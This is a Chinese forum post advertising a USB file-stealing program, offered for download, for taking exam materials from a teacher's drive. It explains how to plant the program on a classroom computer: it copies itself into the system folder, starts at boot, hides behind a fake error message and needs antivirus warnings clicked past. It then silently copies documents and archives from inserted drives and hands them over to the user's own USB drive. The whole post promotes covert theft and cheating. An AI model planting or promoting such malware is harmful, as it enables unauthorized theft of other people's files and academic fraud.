- 注册时间
- 2004-8-29
- 最后登录
- 1970-1-1
|
快考试了,老师的U盘里往往可能有题库或者考试题,想得到吗?老师肯定不给啦!
当然,老师上课必须用课件,就会插U盘,只要插U盘,她就能把里面有价值的东西偷出来~
用法:
植入电脑:
你只要运行zsb_datacoper.exe即可,
运行后她将会自身复制到C:\WINDOWS\SYSTEM下,并建立开机启动,
当看到"XXX不是有效的WIN32应用程序"的假提示时表明植入完毕
如果有杀软拦截需要人工通过,因为此程序不是定位为木马.
偷:
植入完成后只要插入U盘(包括移动硬盘,自动判断),如果U盘根目录没有EPC证书,就会遍历里面所有文件,先偷取txt,xls,doc,wps,ppt,然后再偷取rar/zip文件(通常rar/zip都很大,故最后偷),当然,超过32M的文件不偷,为了速度考虑
偷来的文件暂存在C:\WINDOWS\SYSTEM\box里
取"赃物":
插入根目录有EPC证书的U盘后,程序会自动将已偷来的文件拷入U盘根目录"收获"文件夹里,过程没有任何提示,你看到U盘指示灯不在闪烁时拔出即可.
杀毒软件扫描情况:
http://www.virustotal.com/zh-cn/ ... 72bdf835-1270605413
程序大小:32K+(37,888 字节)
开发环境:VC++
加壳:UPX
想要的自己下载~呵呵
注:证书文件只要放在你自己U盘根目录即可,不要安装
[ 本帖最后由 epcdiy 于 2010-4-7 10:35 编辑 ] |
|